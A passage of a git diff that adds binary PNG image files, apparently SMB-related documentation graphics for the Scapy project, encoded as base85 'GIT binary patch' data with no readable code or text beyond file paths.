z@`Qgn+1uy*YK_QAWYuZtO|{qlarYF#q1^DF%ZCSBQkhS0R`4S#6*F_|a>RvI`#WdC$P6qp@LQuv;l!d}~ z>Q7esKOAy9{8pp}{gTjIO!GUnBTMEhTWkZSFyP7?-^chlg<#G}n_?7VgzhwlVpz@v zo4OMfircz^^{h)IXHW@0OhdwY8dqs(XK(~DHT|X8Y4`4DBF!iHueDXMwjNFjm-9{U z_%z*IT@#H6WY|8{!|I{@!q3V+t>a~Rl=vIYeo?SlRoWUpCa6328ehxZaLp}~MZfTE z&A_qhoD zu6Pct5Ur9T>n@?aSpD8E#(O8iHJTA>|FS!l*aK*{Y7sOSzUh9rAo{eGPu^9*G5lbu z|FasPravOl<0y`t7}cWt&Orpts~>zDUpJN4$b7mbNcESJ z3ZXt`H36I&REVojR?P*9o8qc6unTz0w4yi=(|o3|LYwGwha~}y_E6ICvTKh4j^~7| zJ3-e3SJdYLvgOEnBILQXThWRzPM(u!^71a8vum3179IC8KJlBuG+wbm7M`=xX6!g8 zSa&2k))yHBYYfKK2JIKtv+wx7SIl|uf5|G@6KR}xTcFC%w?#B6m}URmD7d73+{A{6 zkKRJ2?@q9DB(j2X98?z5I;7QIktGCu7rK7`H#S5--sa;tRus)`5nbDz)-CM(Oy{QY z+FQkSEngi@QwXE8@fbfY-Xf}Hae}SVxEAlVbYM~~wB%!!(e(L$nx$`$b#HB$K5?Au z#cvS}aKYGl-`wFBj!xAo+Zhx=Nd5U*q^p)^qa&Y+ermu*v~25rK6`0lS1lT^Pr}(^ zAFV845q*b(#XRAQ!@Ug2glqVD>!-hp-`U?3`XXqG#0@>@e$T51sNrKoV$u+b(MWxd zdLy4jfnA<*moo{`f6L_f&l41|pwUde5BykP0`(!i(m2$DOWsCn!Gp1G%NM?aEK67Q z6O|c-cMDNF408&NM6o;^rrPpYdPJ3UHsJRHc(&w|L^1}l$f7^AS)CXv+l6nm77$j+ ztkw>_OWmMzQdo@`qSnkWeL09M7*+wTu4K8ydu81C2Lkv%(OQv3pRc1`R&25RdL=zE z()nk46>Y=Ssx8(Wb)%@K;QJ~Zd(v4P2pR*j=p7xGmb$u$bOcIm%yd3wma4}#R=bxU zR3Pi_%I5)=M411<P|8PE89CrW5B-zsZE%&YUB$GO zbf~1-<+ndDc<)kdHz!H;iObH;EbX*lt-aG6mR;&?&EHz_D$u}-)(w9*uvH`87OfZ( zPR}{}OkLUTcCFlcWmYs@;GB?dvo{xf(8H~IFz-CERXSx3w_Y0?DPXGRaxvJheW)LB zTg^-rN>*{dK8B#EV@5+eZ6ecMzBg zfEgjM`jS@O?000)8B;t61Y&ZM({?g@S&Jq0P#NN<>P!T%*ppyokvK7hgXE3 zm;Lc$k;jkC`MIV3&lha%&E8nJ{r|sk|8?9Y@(Wk)>e^0koh?O7?QLz%?VLa$)~JF{ z{dPYe6TRPY3yoo;cbEQ>tRy6ChW(%|HJrhrYX83}c$4dN+ zj%5Y?(IS45Y oQiI7V$*CJD!=Q3TYRWR4693OHWIY~~A-@QECienbC}ZsZKa&k1SpWb4 literal 0 HcmV?d00001 diff --git a/doc/scapy/graphics/smb/smb_server.png b/doc/scapy/graphics/smb/smb_server.png new file mode 100644 index 0000000000000000000000000000000000000000..8edb3c5bdcf9637b4fa0e7eb9b6e071a2ccdb219 GIT binary patch literal 112485 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 